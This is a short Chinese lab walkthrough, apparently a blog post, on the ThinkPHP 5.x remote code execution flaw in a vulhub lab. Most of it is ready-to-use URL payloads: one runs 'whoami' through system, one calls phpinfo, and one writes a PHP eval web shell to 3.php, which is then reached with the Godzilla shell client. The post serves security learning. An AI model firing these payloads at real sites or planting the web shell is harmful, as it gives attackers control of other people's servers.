Thinkphp5x远程执行命令及getshell

一.环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:

漏洞利用:

漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通 过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分 原因,在利⽤上会出现⼀些问题

远程命令执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami

执行完如下图

远程代码执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

如下图

写入一句话木马:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>">>3.php

然后去访问我们的3.php 创建成功

哥斯拉连接:

相关推荐
whinc3 小时前
JavaScript技术周刊 2026年第18周
javascript
xqqxqxxq3 小时前
Java AI智能P图工具技术笔记
java·人工智能·笔记
谷雨不太卷3 小时前
进程的状态码
java·前端·算法
jieyucx3 小时前
Go语言深度解剖:Map扩容机制全解析(增量扩容+等量扩容+渐进式迁移)
开发语言·后端·golang·map·扩容策略
顾温3 小时前
default——C#/C++
java·c++·c#
whinc4 小时前
JavaScript技术周刊 2026年第17周
javascript
空中海4 小时前
02 ArkTS 语言与工程规范
java·前端·spring